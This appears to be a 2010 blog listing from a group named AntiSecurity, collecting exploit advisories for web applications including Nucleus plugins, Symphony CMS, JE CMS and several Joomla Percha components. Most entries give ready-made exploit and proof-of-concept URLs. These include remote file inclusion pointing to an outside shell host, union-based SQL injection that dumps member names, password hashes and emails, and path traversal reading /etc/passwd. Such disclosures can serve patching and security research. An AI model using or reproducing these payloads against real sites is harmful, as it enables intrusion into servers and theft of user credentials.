6 June 2010
WebBiblio Subject Gateway System LFI Vuln
[o] WebBiblio Subject Gateway System Local File Inclusion Vulnerability
Software : WebBiblio version 3.0
Vendor : http://webbiblio.sourceforge.net/
Download : http://sourceforge.net/projects/webbiblio/files/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
2 June 2010
SIMM Management System (SMS) LFI Vulnerability
[o] SIMM Management System (SMS) Local File Inclusion Vulnerability
Software : SIMM Management System (SMS) version 2
Vendor : http://anodyne-productions.com/index.php/sms/index
Author : AntiSecurity [ NoGe Vrs-hCk …
31 May 2010
Symphony CMS Local File Inclusion Vulnerability
[o] Symphony CMS Local File Inclusion Vulnerability
Software : Symphony CMS version 2.0.7
Download : http://symphony-cms.com/download/releases/current/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
29 May 2010
Nucleus Plugin Gallery RFI & SQLi Vulnerability
[o] Nucleus Plugin Gallery RFI & SQLi Vulnerability
Software : NP_Gallery version 0.94
Download : http://wakka.xiffy.nl/_media/np_gallery_0941.zip?id=gallery&cache=cache
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=[evilc0de]
http://localhost/[path]/index.php?action=plugin&name=gallery&type=album&id=[SQLi]
http://localhost/[path]/index.php?action=plugin&name=gallery&type=item&id=[SQLi]
[o] PoC
http://localhost/nucleus/plugins/NP_gallery.php?DIR_NUCLEUS=http://host.com/shell?
http://localhost/index.php?action=plugin&name=gallery&type=album&id=1+and+1=2+union+select+1,
group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member–
http://localhost/index.php?action=plugin&name=gallery&type=item&id=1+and+1=2+union+select+1,
group_concat(mname,0x3a,mrealname,0x3a,mpassword,0x3a,memail),3,4,5,6,7,8,9,10+from+nucleus_member–
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke kaka11 inc0mp13te
ArRay …
29 May 2010
Nucleus Plugin Twitter Remote File Inclusion Vulnerability
[o] Nucleus Plugin Twitter Remote File Inclusion Vulnerability
Software : NP_Twitter version 0.8
Download : http://edmondhui.homeip.net/nudn?file=2/NP_Twitter_v0_8.zip
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/
[o] Exploit
http://localhost/[path]/nucleus/plugins/NP_Twitter.php?DIR_PLUGINS=[evilc0de]
[o] PoC
http://localhost/nucleus/plugins/NP_Twitter.php?DIR_PLUGINS=http://host.com/shell?
[o] Greetz
Angela Zhang stardustmemory aJe martfella pizzyroot Genex
H312Y yooogy mousekill }^-^{ noname matthews wishnusakti
skulmatic …
18 May 2010
JE CMS SQL Injection Vulnerability
[+] JE CMS SQL Injection Vulnerability
Software : JE CMS version 1.1
Vendor : http://joenasejes.cz.cc/
Author : Antisecurity Team
Contact : public[at]antisecurity.org
Homepage : http://antisecurity.org
[+] Exploit
http://[site]/[path]/index.php?jepage=viewcategory&categoryid=[sqli]
[+] PoC
http://localhost/index.php?jepage=viewcategory&categoryid=84+and+1=2+union+all+select+1,group_concat(username,0x3a,password),3,4,5,6+from+users–
18 May 2010
Joomla Component Percha Image Attach LFI Vuln
[+] Joomla Component Percha Image Attach LFI Vuln
Software : com_perchaimageattach version 1.1
Vendor : http://www.percha.com/
Author : Antisecurity Team
Contact : public[at]antisecurity.org
Homepage : http://antisecurity.org
[+] Exploit
http://[site]/[path]/index.php?option=com_perchaimageattach&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_perchaimageattach&controller=../../../../../../../../etc/passwd%00
18 May 2010
Joomla Component Percha Gallery LFI Vuln
[+] Joomla Component Percha Gallery LFI Vuln
Software : com_perchagallery version 1.6 Beta
Vendor : http://www.percha.com/
Author : Antisecurity Team
Contact : public[at]antisecurity.org
Homepage : http://antisecurity.org
[+] Exploit
http://[site]/[path]/index.php?option=com_perchagallery&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_perchagallery&controller=../../../../../../../../etc/passwd%00
18 May 2010
Joomla Component Percha Fields Attach LFI Vuln
[+] Joomla Component Percha Fields Attach LFI Vuln
Software : com_perchafieldsattach version 1.x
Vendor : http://www.percha.com/
Author : Antisecurity Team
Contact : public[at]antisecurity.org
Homepage : http://antisecurity.org
[+] Exploit
http://[site]/[path]/index.php?option=com_perchafieldsattach&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_perchafieldsattach&controller=../../../../../../../../etc/passwd%00
18 May 2010
Joomla Component Percha Downloads Attach LFI Vuln
[+] Joomla Component Percha Downloads Attach LFI Vuln
Software : com_perchadownloadsattach version 1.1
Vendor : http://www.percha.com/
Author : Antisecurity Team
Contact : public[at]antisecurity.org
Homepage : http://antisecurity.org
[+] Exploit
http://[site]/[path]/index.php?option=com_perchadownloadsattach&controller=[LFI]
[+] PoC
http://localhost/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../etc/passwd%00
Categories
- Open Source (3 posts)
- Papers (1 posts)
- Tutorial (4 posts)
- Video Tutorial (4 posts)
- Vulnerabilities (78 posts)
Comments
- No comments yet.
Be the first to comment!
Recent Posts
- WebBiblio Subject Gateway System LFI Vuln
- SIMM Management System (SMS) LFI Vulnerability
- Symphony CMS Local File Inclusion Vulnerability
- Nucleus Plugin Gallery RFI & SQLi Vulnerability
- Nucleus Plugin Twitter Remote File Inclusion Vulnerability
- JE CMS SQL Injection Vulnerability
- Joomla Component Percha Image Attach LFI Vuln
- Joomla Component Percha Gallery LFI Vuln
- Joomla Component Percha Fields Attach LFI Vuln
- Joomla Component Percha Downloads Attach LFI Vuln
